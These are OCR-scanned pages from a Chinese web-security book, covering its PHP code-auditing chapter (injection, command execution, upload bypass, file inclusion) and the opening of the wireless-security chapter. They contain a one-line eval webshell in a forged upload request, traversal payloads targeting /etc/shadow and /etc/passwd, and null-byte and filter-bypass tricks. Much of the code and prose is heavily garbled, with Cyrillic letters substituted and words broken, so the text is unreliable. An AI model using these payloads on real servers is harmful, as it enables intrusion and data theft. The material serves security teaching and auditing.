lovely ("+аіегі(123)+' Bytes) 


4-16 XSS 对 话 框 

顺便 提 一 下 ， 这 个 漏洞 因为 格式 限制 不 能 包含 各 种 引号 。 不 要 灰心 ， 这 里 可 以 
用 document.write(String.fromCharCode(.… ...)); 的 方式 写 入 html 标 签 ， 如 <script src=..> 
</script>， 这 里 的 属性 src 不 需要 引号 即 可 加 载 外 部 JS 文件 ， 进 而 利用 这 个 漏洞 。 

通过 简单 地 分 析 可 以 发 现 ， 程 序 员 为 了 简化 代码 《其实 打 完 补丁 之 后 并 没有 简化) 让 
字符 串 类 型 的 $size 通 过 强制 类 型 转换 与 整 型 比较 ， 然 后 直接 将 $size 与 表示 文件 大 小 、 单 位 
的 学 符 串 进行 连接 ， 这 种 简化 是 一 个 很 不 好 的 习惯 ， 在 编写 代码 时 应 避免 利用 强制 类 型 转 
换 来 比较 不 同类 型 变量 ， 这 种 方法 往往 会 被 攻击 者 利用 就 像 这 里 一 样 )。 
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何 为 变量 覆盖 ? 首先 要 了 解 PHP 的 特性 。PHP 是 一 种 类 型 松散 的 语言 ， 它 根据 变量 的 
值 目 动 地 把 变量 转换 为 正确 的 数据 类 型 。 变 量 履 兰 就 是 指 攻击 者 在 攻击 时 给 予 其 特定 的 
值 ， 并 上 履 凋 原 有 的 固定 值 ， 从 而 引发 一 些 安全 问题 。 下 面 介 绍 第 见 的 变量 履 关 。 


4.4.1 变量 初始 化 


此 类 变量 履 盖 需要 在 register_global=on 时 才能 发 生 ， 下 面 来 看 “马云 某 白 帽子 ”的 一 
个 漏洞 。 
<?php 


ГГ ARERR. ..... 
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Case МВ 


StotalNum = $mysql->numTable ("member", 5мһеге); 

/7 省 酷 无 关 代 码 . ..... 

Smembers = $mysql->select ("member","id,name,time,money,pro- 
уіепсе, сіїу, р1сбиге", $мБеге, аггау ("іа ПЕЗС") ‚ аггау ( ($раде- 
1) *$радеМим, $pageNum) ); www.2cto.com 

require (INCLUDE РАТН."раде.с1аѕѕ.рһр"); 

$радеС1аз5 = new page(Spage,StotalNum,SpageNum, WEB URL."member/ 
u.php?action=list", true); 

зрадеСоде = S$pageClass->getCode () ; 

$smarty->assign ("webTitle"," А"); 

$smarty->assign("uList", $members); 

$ѕпагіу->аѕѕідп ("pageCode", $радеСоае); 


$smarty->display ("member/m u 1156.61"); 


function numTable ($ёар1е='', $мһегеѕ=Ға15ѕе) 
{ 
$table = $this->dbPrefix.$table; 
$sql = "SELECT COUNT (2) AS num FROM `Stable`"; 
1Е (Swheres) 
{ 
$sql .- " WHERE "; 
if (is _ array ($мһегеѕ)) 
{ 
foreach ($wheres as $key => $уа1) 


{ 
Swhr [] = "`Skey`=' ".5уа1."'"; 


$sql.= implode(" AND ",$whr); 
} 
else 1Ғ(15 string ($wheres)) 


{ 
$sql.= $wheres; 


} 
$result = $this->fetch ($this->query ($sql)); 
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гейсптп бгези 151 mm 1 


?> 


ХЕ ЗЕ н ууһеге КОН ВИТ ВЖ, Пе B SINA ГЕИ, ЖІП АҒЫЛШ, 
在 这 里 引发 了 注入 ， 注 入 格式 为 ?action=list&where= 注 入 语句 。 


442 ERAS ZSE E = 


extract(O 函 数 的 作用 是 从 数组 中 把 变量 导入 到 当前 的 符号 表 中 。 当 函数 中 type 人 参数 为 


默认 值 、 传 递 的 变量 同名 时 ， 会 进行 履 盖 ， 从 而 引发 其 他 安全 问题 。 下 面 来 看 茶 开 源 程 
序 代码 。 


сазе "сһеск info д014": 
515оп = new Services JSON; 

extract ($ REQUEST); 
om gold ЗА ОО Eron Толе е ршетроиесе 

where изег19='$ изегъа" "); 

здата | "Коп" | = $CFG['info бор gold'] * 1п уа! ($number); 

здага | дога I = $м до1а - здата| "Коп" 1; 

бааға-515оп->епсодйе ($data); 

echo $data; 


第 4 行 的 extract($ REQUESTIMA FAT НЫШ, KERITI А78 ma Pa $table, 
并 补 全 语句 ， 从 而 进行 注入 。 


4.5 ”命令 执行 


命令 执行 是 PHP 中 常见 的 一 种 漏洞 ， 这 种 漏洞 的 危害 较 大 ， 直 接 威 胁 到 服务 器 的 安 
全 。 在 PHP 中 ， 命 令 执行 往往 发 生 在 eval()、assert()、system()、exec()、Sshell exec()、 


passthru()、escapeshellcemd() 这 些 高 危 销 数 上 。 因 为 开发 者 的 疏忽 ， 这 些 函 数 所 执行 的 命令 
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有 时 会 出 现 用 户 可 控 的 情况 ， 从 而 导致 攻击 者 提交 恶意 代码 达到 攻击 目的 。 下 面 将 对 其 进 
行 分 析 。 


451 常见 的 命令 执行 函数 


1. eval() 


该 函数 是 把 字符 串 按照 PHP 代 码 来 执行 。 语 法 格式 : 
еуа(рЬрсоде); 
下 面 是 一 段 问题 代码 : 


<?php 
$сош=$_СЕТ['сош']; 
eval ($com); 


z > 


这 是 一 段 很 简单 的 代码 ， 可 以 看 到 代码 中 将 参数 com 的 值 传递 给 变量 com， 然 后 直接 
将 变量 com 的 值 当 作 PHP 代 码 来 执行 ， 于 是 漏洞 便 产 生 了 。 当 令 参 数 com 为 phpinfo(); 时 ， 
结果 如 图 4-17 所 示 。 


| @ localhost/test.php?com=phpinfo0; W т С а Google <Ctrl+K> | ўї | аз а» | = 


Мт +] = ө SQL- Х55- Encryption: Encoding» Other- 


Ші LoadURL  http://localhost/test.php?com=phpinfo0 > 
8 Split URL + 
(») Execute 


Г] Enable Post data [F] Enable Referrer 


4-17 ”执行 phpinfo 命 令 
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2. ѕуѕіет() 


该 函数 类 似 C 语 言 的 system() 函 数 ， 用 来 执行 指令 ， 并 输出 结果 ， 语 法 格式 : 
system(string command, int [return уаг]); 


下 面 是 一 段 问题 代码 : 


<?php 
5соп-5 СЕТ ['сот']; 
$result=system ($сот) ; 
есһо Sresult; 


2> 


当 参 数 com 为 whoami 时 ， 结 果 如 图 4-18 所 示 。 
当 参 数 com 为 ping baidu.com 时 ， 结 果 如 图 4-19 所 示 。 


http://ocalh...g%20baidu.com x | + 


(4, @ localhost/test.php?com=ping| Y 8 v С | | Q. Google «СК | ў B > | = 


INT “|= Ф SQL- XSS- Encryption- Encoding- Other- 
D — ....... x | ООО ОООО. ча LoadURL |http://localhost/test.php?com=ping Байи.сот 
СФ 2 localhost/test-php?com=whoami Š Split URL 
за |O) Execute | 
Епа е Post data Епа е Referrer 

мм >J = © SQL- XSS- Encryption- Encoding» Other- 

" 正在 Ping baidu.com [183.207.239.6] 具有 32 字 节 的 数据 : ЖЕ 183.207.239.6 
жици 的 回复 : 3245-32 时 间 =7ms TTL=57 ЖЕ 183.207.239.6 的 回复 : 字 节 =32 时 
А Split URL 间 =5ms TTL=57 ЖЕ 183.207.239.6 的 回复 : 字 节 =32 时 间 =7ms TTL=57 ЕҢ 
+) Execute 183.207.239.6 的 回复 : 字 节 =32 时 间 =6ms TTL=57 183.207.239.6 的 Ping 统计 

Г] Eneble Post data Г] Enable Referrer 信息 : 数据 包 : 已 发 送 = 4 , 已 接收 = 4 , Е = 0 (0% 去 失 ) ， 往 返 行程 的 估计 时 

| 间 ( 以 毫秒 为 单位 ): 最 短 = 5ms , 最 长 = 7ms , 平均 = 6ms 

nt authority\system 


图 4-18 ”执行 Whoami 命 令 4-19 ”执行 ping 命 令 


з. апау тар() 


该 函数 返回 用 户 目 定义 函数 作用 后 的 数组 。 回 调 函 数 接收 的 参数 数目 应 该 和 传递 给 


атау map) 函数 的 数组 数目 一 致 ， 语 法 格式 : 


аттау map(function, апау1, array2, атауЗ3...) 


下 面 是 一 段 问 题 代 码 : 


<эрһр 
$са11раск = $ СЕТ [са11раскі]; 
баггау1 = аггау (0, 1, 2, 3); 


заггау2 = array тар ($са11раск, $аггау1); 
шъ 


令 上 述 代码 中 的 参数 callback 为 phpinfo， 结 果 如 图 4-20 所 示 。 


ӛле н — ЮЕ ЖЖ Ж ШИ 


| < @ localhost/test.php?callback=phpinfc v ë | Q Google <Ctri+K» | т | 8 + A > | 


[mr т] = e sQl- Х55- Encryption: Encoding- Other- 


ші Load URL г” а 
+ 


Г| Enable Post даа | | Enable Referrer 


4-20 ”执行 phpinfo 命 令 


4.5.2 动态 函数 


在 实际 开发 中 ， 有 的 程序 员 想 动态 调用 茶 些 函数 ， 却 往往 会 忽略 动态 函数 的 风险 。 
下 面 是 一 段 问 题 代码 : 


<?php 

Ғоипсііоп А (дата) { 
есһо "А: ".здага; 

} 

function В (Здага) { 
echo "В:".здага; 

} 

1Е (1ззе ($ СЕТ! "ТезЕ Гипс'])) { 
str o ОЕ зе ы и = COnG 
$com = $ СЕТ['сош']; 


$test func($com); // 动 态 调用 
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在 上 述 代 码 中 ， 程 序 员 原 意 是 想 动 态 调 用 A 函数 和 B 函 数 ， 所 以 把 变量 test func 作 为 函 
数 名 ， 并 且 可 控 。 但 这 其 实 等 同 于 可 以 执行 任意 函数 ， 当 直接 令 参 数 test_func 为 system， 
参数 com 为 ping baidu.com 时 ， 结 果 如 图 4-21 所 示 。 


http://localh...g%20baidu.com x | + 


< @ localhost/test.php?test_func=systemt Ио е | а БЕ <Ctrl+K> | ў A з 会 e > | = 


[INT "|= © SQL- XSS- Encryption- Encoding- Other- 
ші LoadURL http:/Aocalhost/test.php?test_func=system&com=ping baidu.com 
2 Split URL 


(>) Execute | 


Г] Enable Post даа | | Епа е Referrer 


ІНЕ Ping baidu.com [183.207.239.7] 县 有 32 字 节 的 数据 : ЖН 183.207.239.7 的 回复 : 字 节 =32 时 
间 =14ms TTL=58 ЖЕ 183.207.239.7 的 回复 : 字 节 =32 时 间 =14ms TTL=58 请 求 超时 。 来 自 


183.207.239.7 的 回复 : 字 节 =32 时 间 =13ms TTL=58 183.207.239.7 的 Ping 统计 信息 : 数据 包 : BRŽ | 
= 4 ,已 接收 = 3, ЖЖ = 1 (25% 丢失 ) ， 往 返 行程 的 估计 时 间 ( 以 毫秒 为 单位 ): 最 短 = 13115 ， 最 长 = 
14ms ,平均 = 13ms 


图 4-21 直接 执行 ping 命 令 


4.6 ГЕ 


190) ЕЕК? 熟悉 渗透 的 读者 一 定 知 道 文件 上 传 是 getshell 的 主要 途径 之 一 ， 是 
用 来 获取 Web 权 限 的 重要 漏洞 方式 ， 也 常常 是 Web 渗 透 的 最 后 一 关 ， 可 见 其 重要 性 。 下 面 
便 来 剖析 常见 的 文件 上 传 绕 过 漏洞 。 


4.6.1 JavaScript 绕 过 


先 来 看 一 段 实 例 代码 : 


<?php 


function uploadífile () 


( 


зсоппайртаггау (); 


5соправр type l = array asbh" "ату; // 上 传人 允许 type 值 
$configUp['img'] = array("jpg","bmp","gif","png"); //img 人 允许 后 级 
бсопйадр Г "Наз! | = аггау("Яу", „"5зиЕ"); //flash 人 允许 后 组 
зсоппайр ['оЁйсе'] = аггау ("аос", "аосх" , "аост" "аоЕх", dorm", 


нЕ. “жїз”. БЕ ьа ше ш 1 е "x lam", i мы "КД а Е. 


"ki п е "ks п" Е я СИЕ Ш Е "ррЕ” 5 Трек” е "pptm" 5 eh протх" е прош" е "ррам" ) = 


зсопНайр | 'шеззаде' ]=" ЕЕ"; // 上传 成 功 后 显示 的 消息 , 若 为 空 则 不 显示 


ш 0 
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$configUp['name']= mktime();  // 上 传 后 的 文件 命名 规则 , 这 里 以 UNIX 时 间 


if (is uploaded file($ FILES['upload']['tmp name'])) 
// 判 断 上 传 类 型 是 否 被 允许 


sfilearr=pathinfo($ ЕТЪЕЗ | "пр1оай" | ['папше']); 
$filetype=S$filearr | "ехіепѕіоп"]; 

1Е (1 1п array ($filetype, $šconfigUp[ '1mg'])) 
mkhtml ($fn,"", "错误 的 文件 类 型 ! ") ; 

// 可 以 看 到 当 文 件 名 非法 时 , 调用 mkhtml 函 数 
її (S ЕТЪЬЕ5 | "ир1оай" | ['517е'] > Зсопйайр | "1ша 512е"1%1024) 
mkhtml ($fn,"", "上 传 的 文件 不 能 超过 " .$configUp["img size"]."KB! "); 
$file abso=$configUp["img аіг"]."/". $сопідор ['пате'].".".$#1ебуре; 
$file host=$ ЗЕБУЕВ | 'РОСОМЕМТ ВООТ'] .зШе abso; 
if (move uploaded file ($ ЕІҺЕ5І "ир1оай" | | "ар пате" | ,з Ше host) ) 
( 

mkhtml ($fn, $file арзо,зсопНайр | "пеззаде" |); 
}е15е 
( 
mkhtml ($fn, "", "文件 上 传 失败 , 请 检查 上 传 目 录 设 置 和 目录 读 写 权 限 ") ; 


} 


?> 


下 面 来 查看 mkhtml 函 数 。 


function mkhtml ($fn, $fileurl, $message) 

{ 
echo $str='<script type="text/javascript">window.parent.CKEDITOR. 
ЕСЕН САЛТ ЕНПСЕЛОПГ Тл СЧА a PT PY P A s EE e ri 
ern >: 


ех1 + (55Ъг); 


N “А 黑客 与 安全 技术 指南 


ша 


可 以 看 到 mkhtml 调 用 的 是 一 段 JavaScript 代 码 ， 我 们 再 回 到 uploadfile 函 数 中 。 


if(!in array ($filetype, зсопйдйр | "1та'])) { 
$configUp | ' img' ] == аггау (е праг, "Бир", НЕЕ "рпа") Е 


这 段 代 码 判 断 当 文件 类 型 不 合法 时 便 调 用 mkhtml， 但 无 论调 用 是 否 失 败 ， 都 会 执行 上 
传代 码 ， 因 此 只 要 禁用 JavaScript 就 能 知道 上 传 文件 的 路 径 了 。 
这 里 直接 改 包 代 蔡 (因为 JavaScript 是 客户 端 脚 本 语言 ， 只 对 浏览 器 进行 了 限制 〉， 
如 图 4-22 所 示 。 
| ве | | cance | |<] > НИИ ШІН 


Request 


Concent-Disposition: form-data; name="usd_nick" 


------ WebKitFormBoundarym26ÀWfBbH2E7Z85w 


Concent-Disposition: form-data; паме="арЕ11е"; filename="soft.php” 
Content-Type: image/jpeg 


? 
<?php Веуа1(3 РОЗТ| "ргисе"1)) ; ?> 
------ WebKitFormBoundar ym2 БАМЕВЪНОЕ 7285 и 


| ? || < | [+ || > | Туре а search term 0 matcha 


Незропзе 


Pragma: no-cache | 
Vary: Accept-Encoding 
Concent-Length: 462 
Content-Type: text/html 


<meta http-equiv="Content-Type" сопсепс= "сехс/ ш 


<script language="javascript"> 
parcnt.documcnt.gctElcmcntById('usd image') .valuc-' /ар1оа43/4/20141004/1412405028.рнь'; 
parent .досшпел . getElementByIdl'lodingdiv').st LS š: 


parent .document.getELementById('Lodingdiv') . innerHTML ~ '<font 


color=red>O0000</font>/uploads/4/20141004/1412405028 .php<img src=" /uploads/sys/cancel.png' width="16" 
onclick-"hiddenLoding()">! ; 


| Туре а serh 


84-22 KERE 


4.6.2 文件 头 验证 统 过 


问题 代码 如 下 。 


<?php 

1Ғ(5 FILES[userfile] [Lype] !- "image/gif") 
( 

echo "对 不 起 ,我 们 只 允许 上 传 6IF 格 式 的 图 片 !!"; 
ех1ї; 

} 


541г = Ргеу1опзЕ11е/; 
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$PreviousFile = за1г.разепаше ($ FILES [userfile] [пате]); 

if (move uploaded file ($ FILES [userfile] [пр name], зРгеу1оп5Е11е)) 
{ 

echo "文件 是 有 效 的 ,成 功 上 传 !!4"; 


} else | 

echo "文件 上 传 错误 ! | | 请 重新 上 传 ! ! 1 1 и"; 
} 

2> 


上 面 的 代码 对 文件 类 型 进行 了 判断 ， 只 允许 了 imasge/gif 这 种 类 型 。 但 是 人 们 仍 可 以 伪 
造 GIF89A 这 样 的 文件 头 进行 上 传 。 


463 ”逻辑 问题 


实例 代码 如 下 。 
<?рһр 
// 省 略 无 关 代码 
1f ($split values[0] == strtolower($split img[1]) && $split 
уа1чез [1] == "а11ом") 
( 
$1пуа11Алта = false; 
$i = $extcount + 1000; 
| elseif ($1 == $i values в $split уа1пез 101 !- 


strtolower ($split img[1])) 
( 
// ТЕ the image was valid, ме would һауе exited Бу пом. 


зеггог occured = true; 


} 
// 省 略 无 关 代码 

if ($user dat['usedspace'] < 591гз1 ге) 

( 
ТЕҢІЗІ ехъзЕз (зизег dat Tardrr |, сос 
ЕТЪЕЗ | Вирт си 1е | | name |)) 

( 
if ($ РОЗТ | "оуегига Ее file'] == true) 


( 
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ип11пК (Зизег да [ '"иѕгаіг']."/".$ FILES 
ІбчһісіН1е)| | "пате! |); 
| else | 


зеггог occured = Crie: 


echo "您 试图 上 传 的 文件 已 经 存在 <br /> 请 选择 覆盖 
或 者 更 改 文件 名 重新 上 传 .<br /><br />"; 


} 
| else | 
$еггог оссигед = Егие; 
echo "您 已 经 用 光 了 所 有 的 目录 空间 .<br />"; 
} 
| else | 


ЗЕРРОГ ОССПЕСО = Еге: 


echo "目录 不 存在 . 请 联系 管理 员 .<br />"; 


if (зеггог occured != true) 
( 
if (move uploaded file ($ FILES[$whichfile] ['©юр паше'], 
$user dat['"'usrdir'] . "/" . $ FILES[Swhichfile] | "паше" |)) 
( 
rename ($user да | 'usrdir'] "7" S ЕПЬЕ5 | зъл сие! | "паше" 1, 
-изег да Gardue Са пера Саа ИЕ 
strtolower ($split 119111)); 
// 省 略 无 关 代 码 


?> 


ад НЕ а 28 А гепатер Ж Е, 5 ЖЖ-- Ра. 


if ($split values [0] == strtolower($split 1119111) && $split уа1аез[1] == 


"а11ом") 


当 上 传 xx.jpg.php 时 : 


$split Values [0]=xx 
$split values[1]=jpg 
$split values [2]=php 
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但 可 以 看 到 if 语 句 并 没有 判断 $split values[2], НИХ, БЕ Лтепатер Ж. 


rename ($user dat['usrdir'] . “/" . $ FILES[$whichfile]['name'], S$user ` 


dati osrdir! . "/" . ззр11 5 1п9101 . "." . зігіо1Іомег ($зр11е 1п0111)); 


这 里 会 将 之 前 上 传 的 xx.jpg.php 改 名 为 xx.jpg。 但 根据 rename 函 数 特 性 ， 当 二 次 上 传 同 
名 文件 时 ， 例 如 xx.jpg.php， 紧 接 看 会 进入 流程 ， 尝 试 被 改名 为 Xxx.jpg， 但 因为 xx.jpg 已 经 
存在 了 ， 所 以 成 功 上 传 了 xx.jpg.php。 


文件 包含 也 是 PHP 中 第 见 的 一 种 漏洞 ， 其 结果 往往 就 是 getshell， 其 危害 极 大 。 那 什 
么 是 文件 包含 呢 ? 它 往 往 出 现在 includeO0、 include onceO、requireO、require опсе(). 
fopen, Ше get _ contents 这 些 加 载 文件 的 函数 上 。 因 为 对 文件 名 没有 过 滤 ， 导 致 攻 击 者 可 以 
包含 任意 文件 或 特定 文件 ， 从 而 达到 攻击 目的 。 


4.7.1 漏洞 成 因 
问题 代码 如 下 。 


<?php 
if (S GET тат") ( 
include $ GET['dir']; 
| else | 
include 'test.php'; 
) 


ши 


这 段 代码 的 初衷 应 该 是 想 调 用 茶 文 件 的 样式 和 功能 。 但 因为 这 里 dir 为 用 户 可 控 ， 上 所 以 
可 以 调用 任意 文件 。 而 问题 就 在 于 此 ， 如 果 攻 击 者 上 传 一 个 尾部 有 PHP 恶 意 代 码 的 图 片 ， 
如 upload/xx.jpg， 再 访问 ?dir=upload/xx.jpg， 那 么 恶意 代码 就 会 被 引入 当前 文件 并 执行 ， 
从 而 达到 攻击 目的 。 

当然 ， 文 件 包 含 并 不 仅 限 于 包含 上 传 的 文件 ， 也 可 以 包含 一 些 配置 文件 。 


?dir=.htaccess 
опа afie ДОР al a ДУРТ aD: сопа 
PLP sa н Дар = 
s Дои 
/ 


7 
./.-/../../../маг/1оад/арасце/еггог.1о4а 
(/--/../../../Иргос/сопЯа.ах ( ®гоо ИУ) 
./../../../../екс/зһадйоч ( 需 root 权 限 ) 


е а р с 
. . . В 


РТ 
ЗЕ). 
4224 
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4.7.2 RIRA 
在 实际 开发 中 ， 开 发 者 为 了 避免 受 其 害 ， 对 包含 的 路 径 做 了 很 多 限制 ， 如 下 面 这 段 代 码 。 


<?php 
IFES GETI dir iji 
include ("1пс/".5 СЕТ! dir "w. hlm"); 
Е 
从 这 里 可 以 看 到 ， 开 发 者 对 目录 和 后 级 名 都 进行 了 控制 。 但 人 们 可 以 提交 ../ 轻 松 绕 过 
对 目录 的 限制 ， 同 时 用 %00 截 断 绕 过 对 后 级 的 限制 。 如 ?dir=../../../../../../../etc/passwd， 从 而 
包含 恶意 文件 。 
注意 : %00 截 断 需 要 magic quotes gpc=off，PHP 版 本 小 于 5.3.4 时 才能 实现 。 
当然 ， 对 于 上 述 人 代码， 还 有 其 他 方法 绕 过 其 限制 ， 如 路 人 径 长 度 截断 (PHP 版 本 小 
于 5.2.8，Linux 下 文件 名 长 度 大 于 4096 字 节 ，Windows 下 长 度 大 于 256 字 节 ) 、 点 号 截断 
(PHP 版 本 小 于 5.2.8， 只 适用 于 Windows 系 统 ， 点 号 长 度 须 大 于 256 字 节 ) 等 。 
再 来 看 一 段 对 目录 进行 过 滤 的 代码 。 
<?рһр 
1 (5 СЕТ['а1г']) { 
sstr str герасе("../","./",9 СЕТІ or 1); 
include ("даёа/". 551г) ; 
} 
рд», 
Print .php: 
<?php 
echo ВЕЕТ. 


?> 


这 段 过 滤 代码 是 用 str replace 函数 将 ../ 替 换 成 .,， 从 而 使 攻击 者 无 法 用 ../ 跳 出 目录 。 不 
过 当 提 交 ..…./ 时 ， 因 为 会 将 ../ 符 换 成 ,/， 所 以 又 再 次 变 成 了 ../， 从 而 跳出 了 目录 。 因 此 当 人 们 
提交 ?dir-.../printphp 时 ， 就 成 功 包含 了 文件 。 

测试 结果 如 图 4-23 所 示 。 


@ localhost/test.php?dir=.../print.ph 
р print.php 


[INT Y> = Ф SQL- XSS- Encryption- Encoding- Other- 
аа Load URL 
8 Split URL 
1) Execute 


Г] Enable Post data | | Enable Referrer 


test 


图 4-23 包含 本 地 文件 
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473 任意 文件 读 取 


Ше get_contents 是 最 常见 的 文件 读 取 函数 ， 用 来 把 整个 文件 读 入 一 个 字符 串 中 。 语 法 格式 : 

Ше get contents(path, include path, context, start, max length) 

也 就 是 我 们 党 说 的 任意 文件 读 取 ， 控 制 要 读 取 文件 的 路 人 笃 ， 从 而 达到 攻击 目的 ， 例 如 
读 取 一 些 数据 库 配 置 文 件 等 。 

先 来 看 一 段 代码 : 


<?php 

Сок еу 
$file=file де _ contents ($ СЕТ! "91г"1); 
echo $#1е; 

} 


та 


提交 ?dir=/data/web.config， 结 果 如 图 4-24 所 示 。 


| & | < localhost/test.php?dir=data/web.config| 


= Ф SQL- XSS- Encryption- Епсодта” Other- 
48 Load URL 
Ü Split URL 


JJ Execute 
Enable Post data Enable Referrer 


test 
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48 Жл 


随 看 网 络 的 普及 ， 商 业 网 站 、 政 府 网 站 、 个 人 博客 不 计 其 数 。 而 搭建 网 站 的 门槛 也 变 
得 越 来 越 低 ， 搭 建 过 程 开 始 变 得 模式 化 、 智 能 化 ， 很 多 并 不 懂 网 站 开发 的 人 也 可 以 使 用 开 
源 软件 搭建 属于 目 己 的 网 站 ， 并 且 因 为 开源 软件 价格 低廉 ， 很 多 企业 、 政 府 也 会 选择 安全 
性 高 、 口 碑 好 的 开源 软件 进行 网 站 搭建 。 因 此 ， 开 源 软件 的 安全 性 显得 尤为 重要 。 如 今 随 
看 PHP 被 广泛 使 用 ，PHP 在 开源 市 场 的 地 位 越 来 越 高 ， 这 里 以 小 结 的 形式 来 讲 讲 开源 审计 
的 经 验 。 

在 审计 一 开始 ， 首 先 应 该 通读 全 局 文件 ， 看 看 有 没有 做 一 些 全 局 过 滤 ， 并 且 大 致 了 解 
程序 的 结构 。 如 果 做 了 全 局 过 滤 ， 那 可 以 尝试 对 过 滤 代 码 进 行 bypass， 一 旦 bypass 成 功 便 
是 全 盘 沦 陷 。 

在 审计 中 ， 应 特别 留意 用 户 可 控 的 参数 。 而 对 于 可 控 参 数 的 查找 ， 可 以 检索 一 些 传 参 
数组 ， 使 审计 更 加 高 效 ， 常 见 的 传 参数 组 如 表 4-1。 
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表 4-1 常见 传 参数 组 
二 于 女人 二 


包括 了 $_GET、$_POST、$ COOKIE 等 数组 
文件 上 传 数组 


当 找 到 可 控 参 数 时 ， 就 可 以 分 析 其 进行 了 几 次 传递 ， 有 没有 进入 查询 语句 ， 经 历 了 几 
个 函数 。 而 说 到 函数 ， 在 PHP 审 计 中 ， 高 危 函 数 的 查找 也 是 极其 高 效 的 方法 之 一 ， 第 见 的 
高 危 函 数 如 表 4-2 所 示 。 


返回 PHP 的 所 有 信息 
执行 外 部 程序 或 外 部 指令 ， 与 exec0 类 似 


ё x 
4 
HD TR 
= ЕЧ J 


获取 并 运行 外 部 程序 ， 与 include 类 似 

包含 函数 ， 与 include 区 别 是 一 开始 就 运行 

fle0 Ая _ 
ШЕШЕТШ 


在 开源 程序 中 ， 出 现 更 多 的 是 二 次 漏洞 。 可 以 想象 一 下 ， 假 如 现在 有 很 多 物品 需要 
带 走 ， 但 一 次 带 不 了 那么 多 ， 那 可 以 分 两 次 拿 。 二 次 漏洞 也 是 如 此 ， 把 一 次 攻击 分 两 次 进 
行 ， 但 能 达到 一 样 的 目的 ， 并 且 这 种 漏洞 的 隐蔽 性 较 高 ， 在 大 中 型 开源 软件 中 也 和 背负 出 
现 ， 同 时 这 一 类 漏洞 相对 一 次 漏洞 而 言 更 耗 脑力 ， 更 考验 审计 者 的 耐心 和 体力 。 

当然 代码 审计 中 出 现 的 漏洞 远 不 止 本 章 所 说 的 这 些 ， 还 有 如 拒绝 服务 、CSRF、 平 行 
权限 、Cookie 验 证 绕 过 等 。 
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无 线 安全 或 许 是 目前 这 本 书 中 离 读者 最 近 的 一 个 领域 了 ， 通 过 前 面 章节 的 学 习 可 以 知 
道 ，Web 问 题 通常 出 现在 服务 器 上 ， 代 码 审 计 也 需要 长 时 间 的 经 验 积 累 ， 但 无 线 安 全 的 隐 
患 ， 却 就 在 人 们 身边 。 

本 章 从 多 角度 剖析 了 无 线 安全 ， 从 基本 原理 入 手 ， 然 后 切入 算法 安全 ， 闻 述 无 线 通 信 
中 加 密 算 法 的 应 用 与 破解 ; 接 痢 协 议 安全 解析 了 多 个 标准 协议 的 特性 并 指出 破绽 所 在 以 及 
漏洞 的 利用 方法 ; 通信 安全 分 析 了 无 线 通 信 过 程 中 传输 内 容 的 信息 获取 和 解读 ;杂项 应 用 
讲解 了 在 更 广 范围 的 无 线 安全 领域 中 的 各 类 技术 应 用 和 应 对 措施 。 

这 个 章节 涉及 的 理论 知识 很 多 ， 可 能 对 部 分 读者 来 说 有 些 难 度 ， 读 者 可 在 本 章 基 础 上 
目 行 寻找 一 些 感 兴 趣 的 知识 ， 我 们 也 会 在 Mapers.net 持 续 更 新 相关 知识 技能 。 


5.2 ”无线 安全 基本 原理 


无 线 安全 指 的 是 无 线 通信 和 安全。 一 人 台 设 备 中 的 信息 通过 调制 从 天 线 发 出 ， 男 一 台 设 备 
经 过 滤波 之 后 解 调 信 号 ， 获 得 信息 。 在 这 个 通信 的 过 程 中 所 有 发 射 的 信息 都 是 广播 的 ， 也 
束 是 说 任何 人 在 一 定 汇 围 内 放 一 根 天 线 都 能 接收 到 这 个 信和 号， 这 就 是 无 线 安全 所 有 应 用 的 
根本 前 提 : 如 果 数 据 会 被 别人 获取 ， 那 有 什么 解决 方法 。 


5.2.1 无 线 通 信 


无 线 通 信和 在 传输 的 过 程 中 通常 是 加 密 进 行 的 ， 有 时 由 于 设备 性 能 等 多 种 原因 会 选择 不 
加 密 ， 这 种 情况 称 为 透明 传输 ， 简 称 透 传 。 透 传 的 信号 非常 容易 被 解密 ， 因 此 是 较为 不 安 
全 的 。 只 要 攻击 者 有 合适 的 设备 来 截取 信号 ， 配 合 特定 的 开源 软件 ， 就 可 以 根据 公开 的 协 
议 进 行 解密 ， 然 后 获得 数据 ， 这 就 是 读者 所 熟知 的 “无 线 抓 包 ”。 


522 ”加 密 与 算法 


既然 直接 传输 不 安全 ， 那 肯定 就 要 考虑 加 密 传 输 了 。 加 密 的 原理 就 是 将 数据 编码 ， 以 
至 于 获取 到 数据 的 人 并 非 都 能 解读 其 中 的 内 容 ， 没 有 密 钥 或 者 解密 方法 的 人 得 到 了 加 密 过 
的 数据 也 只 能 干 瞪 眼 ， 而 无 法 获取 其 中 的 信息 〈 这 里 不 考虑 算法 的 有 效 性 和 暴 力 破解 的 可 
ВЕ) 。 所 以 加 密 这 种 操作 ， 在 无 线 传 输 这 种 路 过 多 层 进行 的 传输 中 ， 只 要 有 任何 一 层 通信 
做 了 加 密 ， 通 信 即 可 被 认为 是 安全 的 。 比 如 WiFi 没 有 加 密 ， 但 是 你 使 用 了 加 密 的 VPN 或 者 
代理 来 连接 外 部 网 站 ， 那 么 你 和 该 网 站 之 间 的 通信 依然 是 安全 的 。 

算法 是 指 程序 为 实现 某 一 目的 所 执行 的 步骤 。 加 密 算法 就 是 指 程序 在 对 数据 加 密 的 过 程 中 
所 执行 的 具体 步骤 以 及 计算 的 方法 。 常 见 的 加 密 算 法 有 AES、DES、RC4、RSA 等 。 
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5.2.3 操作 系统 与 实现 


无 线 安 全 在 实践 的 过 程 中 通 芝 会 涉及 操作 系统 的 原理 。Windows 系 统 因 为 内 核 阻隔 了 
程序 直接 与 硬件 交互 的 权限 ， 使 得 程序 只 能 通过 Windows 的 API 来 实现 与 硬件 的 交互 ， 以 
至 于 想 在 Windows 下 使 网 卡 进 入 监视 (Monitor) 状态 是 一 件 很 困难 的 事 。 由 于 这 个 原因 ， 
接 下 来 的 内 容 都 基于 Linux 系 统 。Linux 是 开源 系统 ， 具 有 更 好 的 开放 性 ， 故 被 广泛 地 用 于 
渗透 测试 中 。 无 线 安 全 中 最 常见 的 Aircrack-ng 工 具 套 件 虽 然 也 有 Windows 版 本 ， 但 是 使 用 并 
不 方便 。Linux 下 的 网 络 人 硬件 会 被 做 一 些 特定 的 标记 ， 比 如 eth0 表 示 第 一 个 以 太 网 卡 〈 面 问 
高 级 用 户 的 程序 通常 使 用 0 来 表示 第 一 个 元 素 ) ，lo 表 示 回 路 (这 是 一 个 特殊 的 网 络 设 备 ， 
